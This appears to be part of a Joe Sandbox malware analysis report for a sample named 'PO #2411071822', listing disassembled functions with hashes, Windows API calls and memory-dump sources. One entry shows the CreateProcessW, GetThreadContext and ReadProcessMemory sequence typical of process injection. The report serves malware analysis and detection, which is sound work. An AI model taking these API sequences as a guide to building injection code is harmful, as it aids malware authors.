                                                                                                              • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                              • Instruction Fuzzy Hash: 11620D30A14258DBEB24CFA4C854BEEB376EF58300F1095A9D10DEB394E7759E81CB69
                                                                                                              APIs
                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0042C72F
                                                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0042C746
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Temp$FileNamePath
                                                                                                              • String ID: aut
                                                                                                              • API String ID: 3285503233-3010740371
                                                                                                              • Opcode ID: 60abdce62debf714a0dd6f3d51e30a53bbf5f5e9cd08ccbee66f56efc243d6c9
                                                                                                              • Instruction ID: d70513faba09993ee579aa79c47b9e094165b1c200ce196d4e12b9a366ebc0bc
                                                                                                              • Opcode Fuzzy Hash: 60abdce62debf714a0dd6f3d51e30a53bbf5f5e9cd08ccbee66f56efc243d6c9
                                                                                                              • Instruction Fuzzy Hash: 6DD05E71A0030EABDB10AB90DC0EF8A7B6C9704704F0001B1B650E50B1EAF5E6998B5A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 49cdc46257089f5e4d224cc9bc162724af15a66a356ab820b14e3bb0813984fe
                                                                                                              • Instruction ID: c84526dd029764b8d6aa4f6639ec2c872d8abba8cf43180fda7f961f14dbd7fa
                                                                                                              • Opcode Fuzzy Hash: 49cdc46257089f5e4d224cc9bc162724af15a66a356ab820b14e3bb0813984fe
                                                                                                              • Instruction Fuzzy Hash: FCF16971A043019FC710DF24C985B6EB7E5BF88314F14892EF9999B392D774E909CB86
                                                                                                              APIs
                                                                                                              • __FF_MSGBANNER.LIBCMT ref: 00403973
                                                                                                                • Part of subcall function 004081C2: __NMSG_WRITE.LIBCMT ref: 004081E9
                                                                                                                • Part of subcall function 004081C2: __NMSG_WRITE.LIBCMT ref: 004081F3
                                                                                                              • __NMSG_WRITE.LIBCMT ref: 0040397A
                                                                                                                • Part of subcall function 0040821F: GetModuleFileNameW.KERNEL32(00000000,004A0312,00000104,00000000,00000001,00000000), ref: 004082B1
                                                                                                                • Part of subcall function 0040821F: ___crtMessageBoxW.LIBCMT ref: 0040835F
                                                                                                                • Part of subcall function 00401145: ___crtCorExitProcess.LIBCMT ref: 0040114B
                                                                                                                • Part of subcall function 00401145: ExitProcess.KERNEL32 ref: 00401154
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              • RtlAllocateHeap.NTDLL(00D30000,00000000,00000001,00000001,00000000,?,?,003FF507,?,0000000E), ref: 0040399F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 1372826849-0
                                                                                                              • Opcode ID: 9e9f11207ad7bbc2993c24804fd7d2ac619d3f7185017fa76103dbff1c2dfb80
                                                                                                              • Instruction ID: 45af2be7207b0bb9dfc2f03544719083443ff21f8ea0a3eab6c272d6eb840835
                                                                                                              • Opcode Fuzzy Hash: 9e9f11207ad7bbc2993c24804fd7d2ac619d3f7185017fa76103dbff1c2dfb80
                                                                                                              • Instruction Fuzzy Hash: 6601D6B13452019AE6113F2ADC42A6B3B4C9B82729B20003FF501BB2E1DEBC9D0046AE
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0042C385,?,?,?,?,?,00000004), ref: 0042C6F2
                                                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0042C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0042C708
                                                                                                              • CloseHandle.KERNEL32(00000000,?,0042C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0042C70F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                                              • String ID:
                                                                                                              • API String ID: 3397143404-0
                                                                                                              • Opcode ID: 80a140fa3dc6c7d8cec565e0706f376c321a14e6cde1ede13e6077858fc58705
                                                                                                              • Instruction ID: d93441f51cf762dcbbe7fc0022cc2a00aa564a7faf1ab76c7d8a6414a9d2a406
                                                                                                              • Opcode Fuzzy Hash: 80a140fa3dc6c7d8cec565e0706f376c321a14e6cde1ede13e6077858fc58705
                                                                                                              • Instruction Fuzzy Hash: 1BE08632B40224B7D7211B54AC09FCE7B18AB05760F104120FB14691E0A7F12551879D
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 0042BB72
                                                                                                                • Part of subcall function 00401C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00407A85), ref: 00401CB1
                                                                                                                • Part of subcall function 00401C9D: GetLastError.KERNEL32(00000000,?,00407A85), ref: 00401CC3
                                                                                                              • _free.LIBCMT ref: 0042BB83
                                                                                                              • _free.LIBCMT ref: 0042BB95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                                              • Instruction ID: 58746f1591c22285b6aad3be7597ad271b14a742b0c0c4589d5891f152589de3
                                                                                                              • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                                              • Instruction Fuzzy Hash: 06E012A174575146EA2469BA7E4CEB317CC8F04355754082FB55AF7686CF3CF84089EC
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003E24F1), ref: 003E2303
                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003E25A1
                                                                                                              • CoInitialize.OLE32(00000000), ref: 003E2618
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0045503A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3815369404-0
                                                                                                              • Opcode ID: 2382315e729026b09cec248df13ce1e5b9aabe594c963570d9eaef943c6087d7
                                                                                                              • Instruction ID: 34190eded79d97b8f168eeb7659ac2cb2eade92ae147bb28e2d15446293b1bc8
                                                                                                              • Opcode Fuzzy Hash: 2382315e729026b09cec248df13ce1e5b9aabe594c963570d9eaef943c6087d7
                                                                                                              • Instruction Fuzzy Hash: 2771D4BA9012919FD705EF5AA990695BFA4F79B340F8082BED519EB3B1D7748800CF1C
                                                                                                              APIs
                                                                                                              • IsThemeActive.UXTHEME ref: 003E3A73
                                                                                                                • Part of subcall function 00401405: __lock.LIBCMT ref: 0040140B
                                                                                                                • Part of subcall function 003E3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 003E3AF3
                                                                                                                • Part of subcall function 003E3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003E3B08
                                                                                                                • Part of subcall function 003E3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,003E3AA3,?), ref: 003E3D45
                                                                                                                • Part of subcall function 003E3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,003E3AA3,?), ref: 003E3D57
                                                                                                                • Part of subcall function 003E3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,004A1148,004A1130,?,?,?,?,003E3AA3,?), ref: 003E3DC8
                                                                                                                • Part of subcall function 003E3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,003E3AA3,?), ref: 003E3E48
                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003E3AB3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                              • String ID:
                                                                                                              • API String ID: 924797094-0
                                                                                                              • Opcode ID: 6ce3e184ae517c1377692eddf3d56ed71f3149b51c52a5d002d3dd99cef78604
                                                                                                              • Instruction ID: b85eba7d3733bbb382779666082fbb9a5f2af287d13be6aa5ba02873db484c80
                                                                                                              • Opcode Fuzzy Hash: 6ce3e184ae517c1377692eddf3d56ed71f3149b51c52a5d002d3dd99cef78604
                                                                                                              • Instruction Fuzzy Hash: D1119D71908351DBC301EF6AEC4591ABFE8EF95750F008A2FF584872B1DBB09585CB9A
                                                                                                              APIs
                                                                                                              • ___lock_fhandle.LIBCMT ref: 0040EA29
                                                                                                              • __close_nolock.LIBCMT ref: 0040EA42
                                                                                                                • Part of subcall function 00407BDA: __getptd_noexit.LIBCMT ref: 00407BDA
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                              • String ID:
                                                                                                              • API String ID: 1046115767-0
                                                                                                              • Opcode ID: a193515b83d9b02ea0f93879054cbd795456e41df097b1a78c01b7f4187bfee6
                                                                                                              • Instruction ID: ac2a1f850a5ad5faafef0b31853e9ab0b4bd3e82dcd0933edbcd3dfe67049cd1
                                                                                                              • Opcode Fuzzy Hash: a193515b83d9b02ea0f93879054cbd795456e41df097b1a78c01b7f4187bfee6
                                                                                                              • Instruction Fuzzy Hash: 7A112C72A056108AD711BF66C8417197E606F86339F164B77E4603F1E2C7BC5C109EAE
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040395C: __FF_MSGBANNER.LIBCMT ref: 00403973
                                                                                                                • Part of subcall function 0040395C: __NMSG_WRITE.LIBCMT ref: 0040397A
                                                                                                                • Part of subcall function 0040395C: RtlAllocateHeap.NTDLL(00D30000,00000000,00000001,00000001,00000000,?,?,003FF507,?,0000000E), ref: 0040399F
                                                                                                              • std::exception::exception.LIBCMT ref: 003FF51E
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 003FF533
                                                                                                                • Part of subcall function 00406805: RaiseException.KERNEL32(?,?,0000000E,00496A30,?,?,?,003FF538,0000000E,00496A30,?,00000001), ref: 00406856
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                              • String ID:
                                                                                                              • API String ID: 3902256705-0
                                                                                                              • Opcode ID: 24a19a4aa3a3b22163f95439750b78281c4feb11fd4d86d95a829d529af27245
                                                                                                              • Instruction ID: 37dc7b3730d8fa3096b332887c46b204f3f1d4fbb1702ce0afa7dc0407484d70
                                                                                                              • Opcode Fuzzy Hash: 24a19a4aa3a3b22163f95439750b78281c4feb11fd4d86d95a829d529af27245
                                                                                                              • Instruction Fuzzy Hash: 18F0A43150421E6BDB05BF9AD8019FE7BAC9F01358F65843BFE09A21D1DBB4964086AD
                                                                                                              APIs
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              • __lock_file.LIBCMT ref: 00403629
                                                                                                                • Part of subcall function 00404E1C: __lock.LIBCMT ref: 00404E3F
                                                                                                              • __fclose_nolock.LIBCMT ref: 00403634
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                              • String ID:
                                                                                                              • API String ID: 2800547568-0
                                                                                                              • Opcode ID: 949ae337a3f482bc01a62931c906ac45857c550809e5657e494b08e8a10fda4a
                                                                                                              • Instruction ID: de50bd512800288adb5e74f1436d4282a5122435bfb9130f6bab592cc6b73c7e
                                                                                                              • Opcode Fuzzy Hash: 949ae337a3f482bc01a62931c906ac45857c550809e5657e494b08e8a10fda4a
                                                                                                              • Instruction Fuzzy Hash: C4F0F671800200AAD721BF66880275E7EA45F80339F26853FE411BB2D1CB7C8A019E9D
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00D779FB
                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D77A91
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D77AB3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_d76000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 2438371351-0
                                                                                                              • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                              • Instruction ID: a9817af9226864ade3554cf97360668224f4fae34f9eb488f9bde8c32769f62f
                                                                                                              • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                              • Instruction Fuzzy Hash: 5412CF24E18658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                                                              APIs
                                                                                                              • __flush.LIBCMT ref: 00402A0B
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __flush__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 4101623367-0
                                                                                                              • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                              • Instruction ID: 36c52ded53cb1c45de6bb8c34fd8e954877029bb9075875942f486c0199d070e
                                                                                                              • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                              • Instruction Fuzzy Hash: 0B4195717007069FDB288EA9CA8856F77A6AF44360F24853FE855E72C0DBB8DD418F48
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                              • Instruction ID: 8b3cbb5c11660f3178402d19a3f20207eff25623b3bb69f9ac084d08bd719c9a
                                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                              • Instruction Fuzzy Hash: D031E470A00109DFC71ADF58C490A79FBAAFF49340B6586A5F509CBA66DB31EDC1CB80
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E4214: FreeLibrary.KERNEL32(00000000,?), ref: 003E4247
                                                                                                              • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003E39FE,?,00000001), ref: 003E41DB
                                                                                                                • Part of subcall function 003E4291: FreeLibrary.KERNEL32(00000000), ref: 003E42C4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Free$Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2391024519-0
                                                                                                              • Opcode ID: 8fea74fd4373c911e7dbc3ac0840b1697eea741d7152d9051d831affa5c7934b
                                                                                                              • Instruction ID: 6a0c69967bf93debe68a999e60502773b867753ae5c7743763eac067fc697b9d
                                                                                                              • Opcode Fuzzy Hash: 8fea74fd4373c911e7dbc3ac0840b1697eea741d7152d9051d831affa5c7934b
                                                                                                              • Instruction Fuzzy Hash: 6E112732700325ABCF11BB76DC02F9E77A89F48704F10892DFA92AE1C1DB74DA049B64
                                                                                                              APIs
                                                                                                              • ___lock_fhandle.LIBCMT ref: 0040AFC0
                                                                                                                • Part of subcall function 00407BDA: __getptd_noexit.LIBCMT ref: 00407BDA
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit$___lock_fhandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 1144279405-0
                                                                                                              • Opcode ID: 7eadd4a9b4f8c3e56cc7f82858ea9c7abc7cfc925ce2f704d78e48d816086be4
                                                                                                              • Instruction ID: b7d1bf512b80697c41178f06449301ee036447d0e6cdbb3b1e572a3116d00eca
                                                                                                              • Opcode Fuzzy Hash: 7eadd4a9b4f8c3e56cc7f82858ea9c7abc7cfc925ce2f704d78e48d816086be4
                                                                                                              • Instruction Fuzzy Hash: 4311B2729056008BD7127FA5C80135A3B609F82339F16867AE4303F2E2D7BC9D109BEE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 1029625771-0
                                                                                                              • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
